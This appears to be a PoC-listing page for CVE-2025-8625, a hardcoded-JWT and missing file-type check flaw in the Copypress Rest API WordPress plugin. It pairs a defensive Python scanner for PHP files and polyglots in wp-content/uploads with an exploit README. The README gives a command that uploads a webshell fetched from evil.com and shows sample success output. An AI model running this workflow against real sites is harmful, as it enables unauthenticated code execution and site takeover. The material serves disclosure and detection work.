
CVE-2025-8625 PoC — WordPress plugin Copypress Rest API security vulnerability

Associated Vulnerability
Title: WordPress plugin Copypress Rest API security vulnerability (CVE-2025-8625)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a PHP- and MySQL-based server; a WordPress plugin is an application add-on for it. The Copypress Rest API plugin, versions 1.1 through 1.2, contains a security vulnerability: the plugin uses a hard-coded JWT signing key and does not restrict the file types that can be fetched and saved, which may lead to remote code execution.
Description
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
Readme
# CVE-2025-8625
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
# 🛡️ Copypress Rest API 1.1 - 1.2 RCE Exploit

## 📝 Description

The Copypress Rest API plugin for WordPress (versions 1.1 to 1.2) is vulnerable to **Remote Code Execution** via the `copyreap_handle_image()` function.  
The plugin uses a hard-coded JWT signing key when no secret is set and does not validate file types, allowing unauthenticated attackers to forge tokens and upload arbitrary files (such as PHP shells) through the image handler endpoint.

- **CVE:** CVE-2025-8625  
- **CVSS:** 9.8 (Critical)
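The two defects above (a forgeable token plus no file-type check) leave a PHP file sitting under `wp-content/uploads` as the durable artifact, so a defender's first check is to audit that tree. The following scanner is an added example, not code from the plugin or from this PoC: it flags any upload whose extension is not an image type, whose leading bytes do not match that type, or which carries a PHP open tag inside otherwise valid image data (a polyglot). The allow-list and the sample files in `demo()` are constructed for illustration.

```python
import os
import tempfile

# Extensions an image handler should accept, with the magic bytes each carries.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_MARKERS = (b"<?php", b"<?=")


def classify(path):
    """Return None for a plausible image, else a short reason it is suspicious."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if ext not in IMAGE_MAGIC:
        return f"unexpected extension {ext!r}"
    if not head.startswith(IMAGE_MAGIC[ext]):
        return f"magic bytes do not match {ext}"
    if any(marker in head for marker in PHP_MARKERS):
        return "PHP tag inside image data"  # polyglot: valid header, PHP body
    return None


def find_suspicious_uploads(root):
    """Walk root (e.g. wp-content/uploads) and map relative path -> reason."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reason = classify(full)
            if reason:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = reason
    return findings


def demo():
    """Constructed sample tree: one clean PNG and three files that must be flagged."""
    samples = {
        "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "shell.php": b"<?php echo 'placeholder'; ?>",        # plain PHP file
        "logo.jpg": b"<?php echo 'placeholder'; ?>",         # renamed PHP, wrong magic
        "pic.gif": b"GIF89a" + b"\x00" * 8 + b"<?php echo 1; ?>",  # image/PHP polyglot
    }
    with tempfile.TemporaryDirectory() as tmp:
        day = os.path.join(tmp, "2025", "10")
        os.makedirs(day)
        for name, data in samples.items():
            with open(os.path.join(day, name), "wb") as fh:
                fh.write(data)
        return find_suspicious_uploads(tmp)
```

Run `find_suspicious_uploads("/path/to/wp-content/uploads")` on a real site; a hit on a date directory such as `2025/10` is a candidate for the upload described on this page and should be checked against the web server's POST log for the same day.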

---

## 🚀 Script Overview

**Script name:** `CVE-2025-8625.py`  
This Python script automates exploitation of the vulnerability, allowing you to generate a valid JWT, send a crafted request, and upload a malicious file (webshell) to the vulnerable WordPress site.

---

## ⚙️ Usage

```bash
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
```

- `-u` / `--url`: Target WordPress site URL
- `-shell` / `--shell`: Direct link to your webshell or malicious PHP file

**Example output:**
```
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
```

---

## 🏆 Features

- Generates a valid JWT using the plugin's hardcoded secret
- Bypasses authentication to upload arbitrary files
- Provides clear output for success/failure of exploitation
- Simple command-line interface

---

## 📂 Shell Upload Location

**Shell uploaded successfully! 🎉**  
Shell path example:

```
https://target.com/wp-content/uploads/2025/10/shell.php
```

---

## ⚠️ Disclaimer

This tool is for **educational and authorized penetration testing** purposes only.  
Usage against targets without explicit permission is illegal.

---

***By: Nxploited (Khaled Alenazi)***
File Snapshot

[4.0K] /data/pocs/48cd20fbf40e540570ec43376a45aaadb8d8f563
├── [2.6K] CVE-2025-8625.py
├── [1.5K] LICENSE
├── [1.9K] README.md
└── [ 17] requirements.txt

1 directory, 4 files